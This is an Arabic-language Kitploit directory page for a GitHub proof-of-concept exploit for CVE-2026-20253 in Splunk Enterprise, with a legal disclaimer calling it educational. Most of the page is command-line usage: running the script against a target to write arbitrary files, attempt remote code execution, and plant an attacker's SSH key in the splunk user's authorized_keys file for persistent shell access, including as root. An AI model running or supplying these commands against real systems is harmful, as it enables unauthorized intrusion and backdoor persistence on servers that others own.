Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
أدوات/GitHubGitHub/horkimhab/cve-2026-20253
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

عرض المستودع
9منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20253 - Splunk Enterprise

⚡ الاستخدام البسيط

استخدم هذا المشروع فقط في بيئات آمنة ومصرّح بها، مثل:

  • الأجهزة الافتراضية المحلية
  • حاويات Docker
  • إعدادات معمل معزولة
  • بيئات اختبار الاختراق المصرّح بها

مثال على الإعداد:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirements
pip install -r requirements.txt

مثال على الاستخدام:

root@kitploit:~
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check

# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key

# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh
تنزيل الأداة

الائتمان أو المرجع

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 مستودع أبحاث أمنية تعليمي

مستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني ضمن بيئات خاضعة للتحكم.


⚠️ إخلاء المسؤولية الأمني والقانوني

الغرض

هذا المستودع مخصص للبحث الأمني التعليمي والمصرّح به فقط.

وهو مصمم لمساعدة المستخدمين في التعلّم حول:

  • الثغرات الأمنية
  • مفاهيم العزل والبيئة الرملية (Sandbox)
  • ممارسات الترميز الآمن والدفاع

الاستخدام المصرّح به فقط

استخدم هذا المستودع فقط في البيئات التي لديك إذن باستخدامها، مثل:

  • المعامل الشخصية أو الأجهزة الافتراضية
  • بيئات Docker أو البيئات المعزولة
  • اختبار الاختراق المصرّح به
  • التدريب في مجال الأمن السيبراني أو البحث الأكاديمي

الاستخدام غير المصرّح به أو غير القانوني ممنوع منعًا باتًا.


عدم تحمّل المسؤولية

المؤلف والمساهمون ليسوا مسؤولين عن أي ضرر أو إساءة استخدام أو مشكلات قانونية أو خسائر ناتجة عن هذا المشروع.

باستخدامك لهذا المستودع، فأنت توافق على ما يلي:

  • أنت مسؤول عن أفعالك
  • ستستخدمه بشكل قانوني وأخلاقي
  • المشروع مُقدَّم بدون أي ضمان

الاستخدام الأخلاقي

هذا المشروع مخصص لـ:

  • البحث الأمني الدفاعي
  • التعليم في مجال الأمن السيبراني
  • التوعية بالثغرات
  • البحث في الأنظمة والبرمجيات الآمنة

يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.


الاتصال

للإفصاح المسؤول أو التعاون، تواصل مع القائم على صيانة المستودع عبر GitHub.